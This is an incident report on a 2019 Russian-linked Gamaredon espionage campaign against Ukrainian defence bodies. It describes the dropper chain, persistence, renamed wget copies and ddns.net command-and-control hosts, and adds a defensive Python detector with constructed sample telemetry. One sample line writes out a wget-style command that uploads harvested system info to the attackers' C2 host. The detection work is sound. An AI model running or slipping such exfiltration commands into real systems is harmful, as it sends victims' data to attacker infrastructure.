Cyber Incident Victim: Defence ministry and other institutions in Ukraine
Date: Apr 2019
Location: Ukraine
Summary
The Russian-linked Gamaredon APT group targeted Ukrainian defense entities through a spear-phishing campaign that distributed a malicious executable disguised as a legitimate armed forces document. The attack deployed a multi-stage infection chain of self-extracting archives, batch scripts, and the Pteranodon implant to establish persistence, evade detection by checking for security tools, and exfiltrate system information. The malware used renamed copies of the wget utility to communicate with dynamic-DNS-based command-and-control infrastructure, enabling further payload retrieval and scheduled data theft, consistent with the group's long-standing espionage activity against Eastern European targets.
Description
The incident involved a cyber espionage campaign targeting Ukrainian military personnel, attributed to the Russian-linked Gamaredon APT group. Attackers distributed a malicious executable disguised as a legitimate RTF document titled "State of the Armed Forces of Ukraine," dated April 2, 2019. The file was a self-extracting archive (SFX) masquerading as Oracle software, carrying an invalid digital signature that expired on March 16, 2019. Upon execution, a batch script checked for security analysis tools such as Wireshark and Process Explorer before opening a decoy document ("Document.docx") to maintain the illusion of legitimacy. The script then extracted a password-protected archive ("26710") using the hard-coded password "dcthfdyjdfcdst,tv," placed "winsetup.exe" in the user profile directory, and established persistence with an LNK shortcut in the Startup folder.

Further analysis revealed the SFX contained a UPX-packed version of the wget utility ("MicrosoftCreate.exe") and a malicious script ("30347.cmd") implementing the Pteranodon implant. The script executed "systeminfo.exe" to gather victim machine data, storing results in "fnQWAZC" and exfiltrating them to the C2 server "librework.ddns.net" using wget. The malware scheduled additional tasks: one task downloaded "setup.exe" from "bitwork.ddns.net," while another placed "ie_cash.exe" (another wget copy) in the Microsoft IE application data folder. A recurring task ran every 32 minutes to execute downloaded payloads. Forensic examination of "librework.ddns.net" revealed multiple samples connecting to the same active C2 infrastructure in early April 2019. The attack exhibited longstanding Gamaredon tradecraft, including reused Pteranodon code patterns consistent with variants observed since the group's emergence in 2013, demonstrating sustained Russian operational interest in Ukrainian military and political entities.
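The chain described above leaves several host-level traces a defender can key on: a wget copy renamed to a vendor-looking name and run from a user-writable path, command lines that reach a dynamic-DNS host, and a scheduled task that fires every 32 minutes to launch a binary from the user profile. The following Python is an added example written for this page, not code from the report or any detection product. It scores constructed event records whose field names (image, command line, task interval) are assumptions modelled loosely on process-creation and task-registration telemetry; the sample command line and paths are constructed from the indicators the description names and are not captured from the actual samples.

```python
import re
from dataclasses import dataclass

# Dynamic-DNS providers; both C2 hosts in this incident used *.ddns.net.
DYNDNS_RE = re.compile(r"\b[\w-]+\.(?:ddns|no-ip|duckdns)\.(?:net|org|com)\b", re.I)
# wget options that push a local file to a remote host (assumed usage, not captured).
WGET_UPLOAD_RE = re.compile(r"--post-file=|--post-data=", re.I)
# User-writable locations the chain dropped its binaries into.
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop)\\", re.I)
# Binary names styled to look like vendor software (MicrosoftCreate.exe, ie_cash.exe).
VENDOR_LOOKALIKE_RE = re.compile(r"^(?:microsoft|ie_|windows|oracle)\w*\.exe$", re.I)
# Recurring tasks with a short period are unusual for legitimate software.
SHORT_INTERVAL_MAX = 60


@dataclass
class Event:
    """One telemetry record; field names are this example's assumption."""
    kind: str               # "process" (process creation) or "task" (scheduled task registered)
    image: str              # full path of the executable run
    cmdline: str = ""       # command line, if any
    interval_min: int = 0   # task repetition interval in minutes; 0 = not recurring


def findings_for(ev):
    """Return the list of reasons this event matches the described tradecraft (empty if none)."""
    reasons = []
    name = ev.image.rsplit("\\", 1)[-1]
    in_user_dir = bool(USER_WRITABLE_RE.search(ev.image))
    if in_user_dir and VENDOR_LOOKALIKE_RE.match(name):
        reasons.append(f"vendor-lookalike binary {name} running from user-writable path")
    if DYNDNS_RE.search(ev.cmdline):
        reasons.append("command line contacts a dynamic-DNS host")
    if WGET_UPLOAD_RE.search(ev.cmdline):
        reasons.append("wget-style file upload option on command line")
    if ev.kind == "task":
        if 0 < ev.interval_min <= SHORT_INTERVAL_MAX:
            reasons.append(f"recurring task every {ev.interval_min} min")
        if in_user_dir:
            reasons.append("scheduled task launches binary from user-writable path")
    return reasons


def scan(events):
    """Map event index -> reasons for every event that matched; clean events are omitted."""
    return {i: r for i, ev in enumerate(events) if (r := findings_for(ev))}


# Constructed sample telemetry (not captured data); indicators follow the description.
SAMPLE_EVENTS = [
    # systeminfo output "fnQWAZC" pushed to the C2 by the renamed wget copy
    Event("process",
          r"C:\Users\victim\AppData\Roaming\MicrosoftCreate.exe",
          r"MicrosoftCreate.exe --post-file=fnQWAZC http://librework.ddns.net/"),
    # the 32-minute task that runs the dropped payload
    Event("task", r"C:\Users\victim\AppData\Roaming\winsetup.exe", interval_min=32),
    # benign: Windows service host
    Event("process", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    # benign: vendor updater registered as a daily task from Program Files
    Event("task", r"C:\Program Files\Vendor\Updater.exe", "Updater.exe /check",
          interval_min=1440),
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx].image}")
        for why in reasons:
            print(f"    - {why}")
```

Each rule on its own is noisy (plenty of legitimate software lives under AppData), so the value is in the combination: an event that both runs from a user-writable path and talks to a dynamic-DNS host, or a sub-hour recurring task pointing into the user profile, is worth an analyst's look regardless of the binary's name.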
